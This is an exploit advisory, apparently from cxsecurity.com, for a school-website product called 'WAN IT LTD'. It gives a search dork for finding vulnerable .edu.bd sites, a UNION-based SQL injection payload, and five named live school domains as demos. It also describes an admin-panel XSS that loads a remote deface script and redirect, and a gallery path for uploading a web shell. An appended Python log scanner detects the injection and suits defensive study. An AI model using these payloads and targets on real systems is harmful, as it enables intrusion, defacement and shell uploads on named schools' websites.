WAN IT LTD - SQLInjection / XSS / JSDeface

2017.10.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#Title: WAN IT LTD SQl/XSS Deface
#Dork: intext:"WAN IT LTD" inurl:"id=" +"site:edu.bd"
#Date: 26.10.2017
#Test: W10
#CWEs: CWE-89
#Exploit Discovered By: Informacion - Anonymous
#Author: mr.Gh0st N@0b
#======================#
#P00f:
#http://site.com/about_us.php?menu=aboutus&id=-about-0000001 {Inject}
|---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: menu=aboutus&id=-8681' UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x67495a756b546c697068424a6759715a545a4a4255787748667350656953787a65746450734b4e6f,0x716a7a7171)-- Satn
    Vector: UNION ALL SELECT NULL,[QUERY][GENERIC_SQL_COMMENT]
---|
#Admin Panel
#http://site.com/admin/ {login Here}
#Dem0s:
#http://sonarhatsnc.edu.bd/about_us.php…
#http://rwahs.edu.bd/about_us.php…
#http://rwahs.edu.bd/about_us.php…
#http://www.gozkhalimlths.edu.bd/about_us.php…
#http://coghighschool.edu.bd/about_us.php…
#XSS Alert
#/admin/add_news.php?menu=news {Exploit XSS Script}
#Example
#<script src="http://yourdeface.js"></script>
#<META http-equiv="refresh" content="1;URL=yourdefacepage">
#Upload Shell
#/admin/add_gallery.php?menu=gallery {Upload Here}
#===========================================#
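
For operators of a site running this application, a log check for the UNION query on the `id` parameter of about_us.php, written as an added example that is not part of the original advisory. The log lines, client addresses and the expected-id pattern (modelled on the advisory's `-about-0000001`) are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate ids look like the advisory's "-about-0000001".
EXPECTED_ID = re.compile(r"-?[a-z]+-\d{1,10}")
# Markers of a UNION-based injection, checked after URL decoding.
SQLI_MARKERS = re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b|'|--|/\*", re.I)
# Common/combined log format: host ident user [time] "METHOD target proto" status
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Oct/2017:10:00:01 +0000] "GET /about_us.php?menu=aboutus&id=-about-0000001 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/Oct/2017:10:02:13 +0000] "GET /about_us.php?menu=aboutus&id=-8681%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20x HTTP/1.1" 200 4100',
    '198.51.100.7 - - [26/Oct/2017:10:02:40 +0000] "GET /about_us.php?menu=aboutus&id=12345678901234 HTTP/1.1" 200 3900',
    '192.0.2.44 - - [26/Oct/2017:10:05:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 800',
]

def classify_id(value):
    """Return 'ok', 'sqli' or 'unexpected' for a decoded id value."""
    if EXPECTED_ID.fullmatch(value):
        return "ok"
    if SQLI_MARKERS.search(value):
        return "sqli"
    return "unexpected"

def scan(lines, path="/about_us.php"):
    """Return (client, verdict, status, decoded id) for suspicious requests."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes values, so encoded payloads are normalised.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((client, verdict, status, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `sqli` finding with a 200 status is worth correlating with later requests to `/admin/` from the same client, since the advisory pairs the injection with the admin panel.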

References:

https://www.facebook.com/Informacion-Anonymous-611394289006994/
https://www.facebook.com/official.myanmar.noob.hackers/


Copyright 2017, cxsecurity.com

 
